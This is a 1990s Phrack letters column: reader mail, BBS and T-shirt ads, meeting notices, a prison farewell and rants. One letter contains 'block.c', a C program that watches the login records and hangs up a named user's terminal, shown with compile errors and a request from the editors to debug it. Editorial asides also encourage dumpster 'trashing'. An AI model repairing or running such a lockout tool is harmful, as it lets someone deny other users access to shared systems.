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==Phrack Magazine==
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Volume Five, Issue Forty-Five, File 2 of 28
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Phrack Loopback Part I
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Letter from Louis Cypher (Byron York)
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As many people know, I was convicted over the summer for a number of
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Federal crimes including counterfeiting, burglary of a post office,
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theft of US mail, and possession of stolen property. For a little
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background, I was arrested for these crimes in September of 1992.
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I stayed out on 50,000 dollar bond until the trial which started the
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day after Summercon 93'. The trial lasted for about a week and a half,
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and the jury found me guilty on 4 charges and acquitted me on 2.
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My sentencing was not until the 8th of November, and the results
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were not as I had hoped for being a first time offender and all.
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I received a 21 month sentence that will be carried out if I do
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not complete 6 months in a Federal boot camp in Pennsylvania.
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If I do complete the program at the boot camp I will then spend
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6 months in a Federal halfway house in Houston. This will be
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followed by several months of home confinement, then 3 years
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parole. I am to attend college while on parole, but if I do not
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do well, then I have to do 300 hours of community service.
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I will start serving my sentence as early as December, or as late
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January. Won't know until I receive the letter in the mail from
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the Bureau of Prisons. I am still out on bond and am on voluntary
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surrender so I just deliver myself to wherever they send me. A lot
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better than rotting in county jail until they transfer me.
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I will hopefully be out still for HoHocon, and will be able to
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say good-bye to most people in person. But in case I am not, then
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I would like to use this forum to tell everyone good-bye. I know
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that I am not going away forever, but I don't know when I am
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going to be able to access a modem again and get back in touch
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with everybody.
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I have been running a public access Internet site in Houston
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for the past year or so, and luckily, thanks to Drunkfux,
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Absalom, and Lord Macduff, the system will most probably
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stay up in my absence. People will be able to mail me there,
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and I will be able to respond through the help of people over
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the phone.
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I would like to thank Erik Bloodaxe for letting me use Phrack
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to tell everybody farewell. I hope nothing's changed when I get
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back, and I will be back. I'll just have to keep my nose a little
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cleaner when I come back from my sabbatical.
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It's been great, and I'll see all of you hopefully in about
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a year or so.
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[Byron did get to go to HoHoCon, but shortly thereafter had to fly to
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Pennsylvania to enter Boot Camp.
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Byron's Address in prison is:
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J.C.C.
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Byron York 60177-079
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P.O. Box 1000
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Lewisburg, PA 17837-1000
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Drop him a note. It really makes the day go by a little easier in
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a world of bloody shank wars with the Texas Syndicate. Jail sucks.]
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[Ad for Jolly Roger T-Shirt]
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>[God bless the free enterprise system!
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> God bless capitalism!
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> God bless America!]
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Well, I'm an atheist and natural law objectivist, so I'll cheer right along
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with you on the capitalism part! Capitalism is the only MORALLY PROPER
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system because it's the only system (or lack thereof) that doesn't treat
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people as slaves!
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[editorial]
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>This is going to piss people off, but hell, that's the point of having
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>an editorial, eh?
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I, for one, fucking loved it.
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>Granted, Holland has a notoriously permissive and open society; and
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>indeed, Europe in general is far more laid back than the States, but
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>even many in the US hold these ideals close to heart.
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Europe also has a great police state tradition, not to mention the common
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and prevailing attitude that while sex and drugs and rock and roll are okay,
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making money (creating wealth) is a far more heinous crime.
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>...The major cons in America (HoHo, Scon) really don't charge.
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>They "ask" for donations. Sure, you might get a nasty look if
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>you don't cough up five or ten bucks, but hell, everyone does. They
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>WANT to. A good time is worth a handful of change. And there isn't
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>some awesome requirement just to get in the damn door. Besides, losses
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>can always be made up by selling a plethora of crap such as t-shirts and
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>videos, which everyone always wants to buy. (Hardware costs. :) )
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VOLUNTARY donations! (The Supreme Court says "our system of taxation is
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based on VOLUNTARY COMPLIANCE"...) There's a vast and monstrous difference
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between voluntary and involuntary - it's that nasty "free will thing"!
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>Then there was Phrack. Always free to the community. Always available
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>for everyone's enjoyment. Asking only that Corporate types pay a
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>registration fee of a hundred dollars just to keep them honest. (They
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>aren't.) Knowing full well that they are stealing it, sometimes quite
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>brazenly. Resting quietly, knowing that they are just as unethical as
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>they ever claimed us to be.
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I also love your registration requirements. Being able to claim ownership
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of property, intellectual or otherwise, means you dictate the terms and
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conditions of its use. Corporate lawyers must have had coronaries upon
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first sight. Only difficulty is, your ISSN number and copyright data
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are prima facie evidence that you contracted away rights in exchange for
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privilege from the state, revocable whenever the state feels like it
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(copyright falls under admiralty jurisdiction, not common law). You've
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formed an "organization" - your registration form recognizes the fact
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that "corporations, organizations and other artificial persons" have
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a lesser STATUS before the law than NATURAL INDIVIDUALS - just be who
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you are!
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>Let me tell you something. Information does not want to be free, my
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>friends. Free neither from its restraints nor in terms of dollar value.
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>Information is a commodity like anything else. More valuable than the
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>rarest element, it BEGS to be hoarded and priced. Anyone who gives
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>something away for nothing is a moron. (I am indeed stupid.) I can't
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>fault anyone for charging as long as they don't try to rationalize their
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>reasoning behind a facade of excuses, all the while shouting "Information
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>Wants to be Free!"
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AMEN, from the highest fucking rooftops! You're not stupid, you're doing it
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by CHOICE. You're VOLUNTARILY doing it. Free people don't NEED laws that
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force decisions upon them - they do what needs to be done!
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>Trade secrets don't want to be free, marketing projections don't want to
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>be free, formulas don't want to be free, troop placements don't want to
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>be free, CAD designs do not want to be free, corporate financial
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>information doesn't want to be free, my credit report sure as hell
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>doesn't want to be free!
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YES! YES! I HAVE WAITED FOR YEARS FOR THIS MOMENT!
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[tale of the Little Red Hen]
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Amen again!
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This whole issue, in fact, had many great things, which I'll continue
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to reply to here...
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[ ... 10K of commentary removed ... ]
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Finally...remember how crazy people got in the years just before the turn of
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the first millennium (990-1000 A.D.)? It's gonna be even MORE interesting
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this time around!
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Here's to Phrack... may you last into the 21st century! (May we ALL be so
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lucky...)
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[Man, that was one of the coolest letters we've ever gotten (and definitely
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the longest. I have to tell you, it does my heart good to know that we
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are indeed appreciated by some of you. We will continue to do so until
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as long as humanly (or inhumanly, with my schedule) possible.]
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A document I found in trash......
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What's Next 1993 Revenue 1993 Operating
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in billions Cash Flow in billions
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AMERITECH $11.71 $4.72
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Pursue in-region strategy. Push regulators for entry into long distance
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business.
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BELL ATLANTIC $12.99 $5.34
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Proceed with interactive networks linking 1.2 million homes by
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year-end 1995. Seek local cable partners.
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BELLSOUTH $15.88 $6.64
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Decide whether to invest $500 million of QVC, despite loss in
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Paramount fight.
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NYNEX $13.4 $5.06
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Proceed with $1.2 billion investment in Viacom. Build new networks
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in Northeast, but only if it wins new regulatory freedom.
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PACTEL $10 $4.08
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Pursue in-region strategy for new personal communication services.
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SOUTHWESTERN BELL $10.69 $4.08
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Pursue cable relationship with Cox Enterprises Inc.; complete
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$552 million acquisition of upstate New York cellular franchises.
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USWEST $10.29 $4.45
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Offer new phone services in New York cable systems; may pursue
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Cablevision Systems Corp. with partner Time Warner.
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Total $84.98 $34.53
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Gee whiz now I really sympathize with the phone company about their petty
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loss on fraud.
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[Fuck. And you mean to tell me THEY can't afford a measly 100 bucks
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registration fee? Maybe them thought it was 100 Million bucks. But
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even then it's well within their grasp. Hmm...maybe the fee should go up.]
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I would like to pay respects to a fellow user on my system who was killed in
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the recent helicopter crash near San Jose, CA. "Rotor" was a user-friendly
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d00d who would always talk your ear off about helicopter technician work. It
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is a great loss to our local community.
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Call the CybernaughtG@twAy. el33t x10^8 (408) 911-3974 Login <guest>
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[I want to say I'm very sorry about your friend. I know exactly how
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you must feel.]
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For immediate rebroadcast::::::::::::::::::::::
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The SenseReal Foundation
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The SenseReal Foundation is a non-profit, non-organization dedicated
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to the preservation and free distribution of information and the
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promotion of the Amiga computer. In this ever increasing police state
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we live in the Amiga computer is a beacon of hope. If you buy into Big
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Blue you are buying into Big Brother. The information revolution is
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happening now. More and more our liberty will depend on the acquisition,
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Call this number anytime. Primary hours are Fri-Sun 6PM-6AM but you
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[Uh, gee, little did I realize that when I bought my Amiga 500, I was joining
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such a sacred brotherhood. I wonder what my employers would think.]
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So, there I am in New York City last night. We're hanging out
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(figuratively speaking) at The Vault, where various fetishists
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get together to explore the limits of aberrant human sexuality.
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All in all, a rather interesting place. The $30 cover was a little
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steep, but I would still highly recommend it. Now for my point.
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I was standing around watching two dominatrix abuse some
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naked, prostrate wretch when one of them started walking around
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giving out business cards to anyone who admitted to having a
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computer and an Internet feed (these are dominatrix on the
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cutting edge of technology, I might add). The card reads thus:
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CYBEROTICA Online
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Ride the wave of erotic communication into the 21st century, as
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CYBEROTICA Online(tm) becomes your point-of-penetration into
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Cyberspace. Transport yourself into a universe of wild fantasy-
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and-fetish images, tales, and intimate, anonymous interaction with
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erotic-video stars, industry insiders, and thousands of open-minded
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people around the world.
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Experience CYBEROTICA Online for FREE as our VIP guest while we
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perfect the system, and in exchange for your valued input you'll
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receive added VIP privileges as we grow! Contact us today for
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your free Infopac and Startup Software, before this opportunity
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ends. 212.587.0197 fax 587.0513
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80 n moore st., tribecca, ny 10013 email: steffani@echonyc.com
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I am sure this is just a teaser to get people on-line and then
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start charging them, but I found it pretty interesting.
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---tabas
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NOTE: I have no knowledge of or affiliation with the above
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organization and the posting of this message does not
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constitute an endorsement of perversion.
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[Well, hell...now I know where to go next month when I'm back in NYC.
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I wish I would have know about this place last time...the only places
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I could find for even semi-serious sleeze was in Times Square, and I know
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that was way too tame and trendy to be IT. Now I know.]
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The earthquake in Los Angeles, California, the flood in Europe, the seemingly
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unstoppable war in the former Yugoslavia, the devastating fires in Australia,
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the flood in the Midwest of the United States of America, the devastating fires
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near Los Angeles, California, the rapid and appalling increase in violence in
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cities, towns, villages all over the world, the famines, the diseases, the rapid
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decline of the family unit, and the destructive earthquake in India (in 1993)
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are signs that this world's history is coming to a climax. The human race
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has trampled on God's Constitution, as given in Exodus 20:1-17 (King James
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Version Bible), and Jesus is coming to set things right. These rapidly
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accelerating signs are an indication that Jesus is coming soon (Matthew 24).
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God's Holy Spirit is gradually withdrawing its protection from the earth
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and the devastating events you see are demonstrations of Satan's power. All
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those who are not guarded by God are in danger of forever losing eternal life.
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If you want to know what's about to happen, please study the books of Daniel
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and Revelation which are located in God's Word, the Bible. They are not
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sealed or closed books. They can and must be understood by all. Every word
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in the Bible from Genesis to Revelation is true. The Bible and the Bible only
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must be your guide.
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When God's Law (the Constitution for the Universe) is consistently ignored,
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disregarded, changed, and questioned, He permits certain events to occur to
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wake us up. I would urge all, wherever you are and regardless of the
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circumstances, to directly call on Jesus and ask Him to intervene in your life.
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Jesus who created this planet and every living creature in it and on it, died
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on the cross, was raised from the dead by God the Father, and is now in Heaven
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interceding for you. Jesus is the only One who can rescue us from the slavery,
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misery, and death Satan is causing us.
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For reference I'm including God's Constitution as given in the King James
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Version Bible. Please note that when God says the seventh day, he means Sabbath
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(the 7th day of the week) not Sunday (1st day of the week).
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Commandment #1: Exodus 20:1-3 (KJV) And God
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spake all these words, saying, I am
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the LORD thy God, which have brought
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thee out of the land of Egypt, out
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of the house of bondage. Thou shalt have
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no other gods before me.
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Commandment #2: Exodus 20:4-6 (KJV) Thou shalt not make
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unto thee any graven image, or any
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likeness of any thing that is in heaven
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above, or that is in the earth beneath,
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or that is in the water under the earth.
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And shewing mercy unto thousands of them
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that love me, and keep my commandments.
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Commandment #3: Exodus 20:7 (KJV) Thou shalt not take
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the name of the LORD thy God in vain;
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for the LORD will not hold him
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guiltless that taketh his name in vain.
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Commandment #4: Exodus 20:8-11 (KJV) Remember the sabbath
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day, to keep it holy. Six days shalt thou
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labour, and do all thy work: But the
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seventh day is the sabbath of the LORD
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thy God: in it thou shalt not do any
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work, thou, nor thy son, nor thy daughter,
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thy manservant, nor thy maidservant, nor
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thy cattle, nor thy stranger that is
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within thy gates: For in six days the
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LORD made heaven and earth, the sea, and
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all that in them is, and rested the seventh
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day: wherefore the LORD blessed the sabbath
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day, and hallowed it.
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Commandment #5: Exodus 20:12 (KJV) Honour thy father and thy
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mother: that thy days may be long upon the
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land which the LORD thy God giveth thee.
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Commandment #6: Exodus 20:13 (KJV) Thou shalt not kill.
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Commandment #7: Exodus 20:14 (KJV) Thou shalt not commit
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adultery.
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Commandment #8: Exodus 20:15 (KJV) Thou shalt not steal.
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Commandment #9: Exodus 20:16 (KJV) Thou shalt not bear
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false witness against thy neighbour.
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Commandment #10: Exodus 20:17 (KJV) Thou shalt not covet
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thy neighbour's house, thou shalt not
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covet thy neighbour's wife, nor his
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manservant, nor his maidservant, nor
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his ox, nor his ass, nor any thing that
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is thy neighbour's.
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I also recommend that the following books be obtained and closely studied:
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The Great Controversy
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By Ellen G. White
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Review and Herald Publishing Association
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Hagerstown, MD 21740
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The Desire of the Ages
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By Ellen G. White
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Review and Herald Publishing Association
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Hagerstown, MD 21740
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Patriarchs and Prophets
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By Ellen G. White
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Review and Hearld Publishing Association
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Hagerstown, MD 21740
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Daniel and the Revelation
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By Uriah Smith
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Review and Herald Publishing Association
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Hagerstown, MD 21740
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[Praise the Lord & Pass the Ammunition!]
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Big Brother Inside Logo
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A parody of the Intel's Logo modified for the Clipper Chip is now available
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for use for stickers, posters, brochures etc.
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The Big Brother Inside graphic files are now available at the CPSR
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Internet Archive - ftp/gopher cpsr.org /cpsr/privacy/crypto/clipper
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big_brother_inside_sticker.ps (postscript-scale to fit your project)
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big_brother_inside_logo.gif (Color GIF - good startup/background screen)
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big_brother_inside_picts_info.txt (Info on the files)
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The files have also been uploaded to America Online in the Mac Telecom and
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Graphic Arts folders.
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big_brother_inside_sticker.ps is a generic postscript file, created in
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CorelDraw. The postscript image lies landscape on the page, and consists
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of the intel-logo's ``swoosh'' and crayon-like lettering on the inside.
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This design was originally created for the sticker project: the image was
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screened onto transparent stickers 1" square for the purpose of applying
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them to future clipper-chip products. (cdodhner@indirect.com was in charge
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of that project; as far as I know he's still distributing them for a small
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donation to cover printing & mailing costs).
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The design was created by Matt Thomlinson <phantom@u.washington.edu>
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[The stickers I have made a HUGE hit among the various "select targets"
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at COMDEX. Get yours and join in on the fun. There are a world of
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mass merchant distributors waiting to be "tagged." Sounds like the
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SenseReal foundation would love a handful of these for those pesky
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Intel boxes.]
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HI,
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1st I want to thank you for dedicating your space to the silliness
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and foolishness that comes with anything Sara Gordon related.
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I think I should have gotten the last word but, who wants to turn this
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into a public feud, specially with a demented middle aged woman.
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Well, Thanks anyway for including the article, I have found people in
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the underground who believe what I am saying, as I have no monetary
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interest in this unlike Mrs. Gordon.
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Kohntark.
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[Well Kohntark, looks like you DID get the last word. No, wait, I did.]
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Hello Chris,
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I have a constant battle with some of my friends over who can ruin
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another person's display first. Well, if I could log them out...
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However, I'm afraid the program doesn't compile.
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Thanks for any light you might be able to shed on the matter.
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Bye!
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I get these 3 errors:
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"block.c", line 22.17: 1506-030 (S) Identifier open cannot be redeclared.
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"block.c", line 41.18: 1506-045 (S) Undeclared identifier user.
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"block.c", line 48.16: 1506-045 (S) Undeclared identifier W_OK.
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/* block.c -- prevent a user from logging in
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* by Shooting Shark
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* usage : block username [&]
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* I suggest you run this in background.
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*/
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#include <stdio.h>
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#include <utmp.h>
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#include <ctype.h>
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#include <termio.h>
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#include <fcntl.h>
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#define W_OK2
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#define SLEEP5
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#define UTMP"/etc/utmp"
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#define TTY_PRE "/dev/"
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main(ac,av)
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int ac;
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char *av[];
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{
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int target, fp, open();
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struct utmpuser;
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struct termio*opts;
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char buf[30], buf2[50];
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if (ac != 2) {
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printf("usage : %s username\n",av[0]);
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exit(-1);
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}
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for (;;) {
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if ((fp = open(UTMP,0)) == -1) {
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printf("fatal error! cannot open %s.\n",UTMP);
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exit(-1);
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}
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while (read(fp, &user, sizeof user) > 0) {
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if (isprint(user.ut_name[0])) {
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if (!(strcmp(user.ut_name,av[1]))) {
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printf("%s is logging in...",user.ut_name);
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sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
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printf("%s\n",buf);
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if (access(buf,W_OK) == -1) {
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printf("failed - program aborting.\n");
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exit(-1);
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}
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else {
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if ((target = open(buf,O_WRONLY)) != EOF) {
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sprintf(buf2,"stty 0 > %s",buf);
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system(buf2);
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printf("killed.\n");
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sleep(10);
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}
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} /* else */
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} /* if strcmp */
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} /* if isprint */
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} /* while */
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close(fp);
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/*sleep(SLEEP); */
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} /* for */
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}
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[Anyone want to take a crack at this?? Debug it and mail it back to us
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so we can forward it on...]
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IT'S BACK!!!!W$#@$#@$
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_-_-_-_-_-_-_-_-_
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( )
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( B00m )
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( )
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CAU (__ __) CAU
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__\/___
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"We WiLL BloW /---/|_____|\----\ uP YoUr CaR!"
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/CaU-__WuZ__-HeRe\-
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(0) (0)
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fARM R0Ad 666
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*fR666.something.com* (713)855-0261 *fR666.something.com*
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CAU-0b/GYN SySoPs: EighT BaLL
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kCf-ThP-Phrack M.C. Allah
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Bc0maP-d0S/2-Tone Drunkfux
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' CAU Home ' Bc0maP Couriers Site
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' cDc Factory Direct Outlet(kCf) ' 0b/GYN Member Site
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' USENET, InterNet E-Mail(s00n) ' Hack/Phreak Discussions
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' Flashback Software ' ToneLoc Distribution Site
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' 12oo-14.4 bps ' Exophasia Submission Site
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' 0PhiCiAl PHraCk DiSt Site ' No Ratios for non dorks
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xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx
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[This is 8-Ball's bbs. Call it and watch him shoot up. Word.]
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Hackers, phone phreaks, techno-anarchists, cyberpunks, etc.
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* * * THE OFFICIAL U.K. '2600 Magazine' MONTHLY MEETINGS. * * *
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Meetings are held on the first Friday of each month.
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All those interested in attending will be required to meet at
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the Trocadero shopping centre, which is a one minute walk from
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the Picadilly Circus underground station, London.
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The meeting point is actually inside the shopping centre, next
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to the Virtual Reality machines located on the bottom floor.
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Anyone interested in taking part should assemble next to these
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machines between 7.00pm and 8.00pm.
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Those who attend will then travel by tube train to a 'unknown'
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location for computer underground discussion, information
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exchange, etc.
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For more information, phone 'Damian' on 071-262-3042, or send
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email to 'uabbs@works.com'
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Check page '46' of your latest '2600 Magazine' for details of
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other meeting locations, etc.
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2600 Magazine
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PO Box 752
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Middle Island
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NY 11953
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U.S.A.
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Tel: +1-516-751-2600 (24 hour answering system)
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Fax: +1-516-751-2608
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This bulletin was created by 'Phantasm' on Tuesday 08-Feb-94 at 11:51pm.
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[You brits: GO TO THESE MEETINGS! And go trashing afterwards! And
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|
raise some hell. Throw caution to the wind. Be loud and obnoxious.
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|
Get thrown out. (Just pretend you are Americans. It works every time.) ]
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Hello,
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|
|
I run a board here in the UK known as Unauthorised Access. We have been
|
|
online since 1990 (the year of our anti-hacking law's approval) and the
|
|
system is now the largest computer underground board in the U.K. (2,000+
|
|
quality files and growing each day)
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|
|
|
I also attended the HEU congress in Holland but although I spoke with
|
|
Eric Corley (2600) and BillSF (Hack-Tic), I did not know where to find
|
|
you. I expect you dissappeared off to Amsterdam like so many of the
|
|
other visitors to Holland.
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|
|
Anyway, I noticed in your last issue (44) that you seem to have quite a
|
|
few readers in the United Kingdom. I would like to tell you about my
|
|
system here in the UK. (Please include this advert in your next issue
|
|
of PHRACK) Thanks!
|
|
|
|
Unauthorised Access
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|
Online 10.00pm-7.00am GMT
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|
Established 1990
|
|
Britain's largest computer underground system
|
|
30+ message special interest groups
|
|
2,000+ underground file online
|
|
c64/Amiga/IBM/ h/p util support
|
|
Running at 3oo/12oo/24oo/96oo HST
|
|
tel: +[44] 636-708063
|
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|
|
SysOp: Phantasm
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|
----------------------------------------
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|
|
[I always dig Overseas BBSes. Unfortunately I couldn't get a strong line
|
|
when I've tried to call. Geez, you would think that in this age of
|
|
fiber, I may be able to connect...but noooooo. :) ]
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|
|
New TimeWasters T-shirts !
|
|
|
|
Do you know the feeling ? You're behind your terminal for hours,
|
|
browsing the directories of your school's UNIX system. Instead of
|
|
holes, bugs and bad file permissions you find tripwire, TCPwrapper and
|
|
s/key. You run a file with a s-bit and immediately you get a mail from
|
|
the system admin asking what you are doing. In other words, no chance
|
|
to ever become a good hacker there.
|
|
|
|
Now you have the chance to at least pretend to be an eleet
|
|
hacker. The Dutch hacking fanatics The TimeWasters have released
|
|
the third version of their cool 'hacker' T-shirt. Because
|
|
the previous versions were too limited (20 and 25 shirts) we
|
|
printed no less than 200 shirts this time.
|
|
|
|
Of course you want to know, what does it look like ?
|
|
On the front, a TimeWasters logo in color. Below that a picture
|
|
of two hacking dudes, hanging behind their equipment, also
|
|
featuring a stack of phracks, pizza boxes, beer, kodez, and
|
|
various computer-related stuff with a 'No WsWietse' sticker.
|
|
On the back, the original TimeWasters logo with the broken
|
|
clock. Below it, four original and dead funny real quotes
|
|
featuring the art of Time Wasting.
|
|
|
|
Wearing this shirt can only provoke one reaction; WOW !
|
|
Imagine going up to the helpdesk wearing this shirt and
|
|
keeping a straight face while asking a security question !
|
|
|
|
And for just $2 more you'll get a pair of sunglasses with
|
|
the text 'TimeWasters' on them !
|
|
|
|
To order:
|
|
Send $20 or $22 to
|
|
TimeWasters
|
|
Postbus 402
|
|
5611 AK Eindhoven
|
|
The Netherlands, Europe
|
|
This includes shipping. Please allow some time for delivery. If you
|
|
are in Holland, don't send US$, email the address below for the
|
|
price in guilders and our 'postbank' number.
|
|
|
|
For more information: email to:
|
|
- timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile
|
|
with more info.
|
|
- rob@hacktic.nl or gigawalt@win.tue.nl for questions.
|
|
|
|
[I've got one Time Wasters shirt...Now I'm gonna have to get another.
|
|
Wonder if they'll trade...I know this guy who makes some damn cool
|
|
shirts... but the glasses are the clincher. I'm ordering now.]
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|
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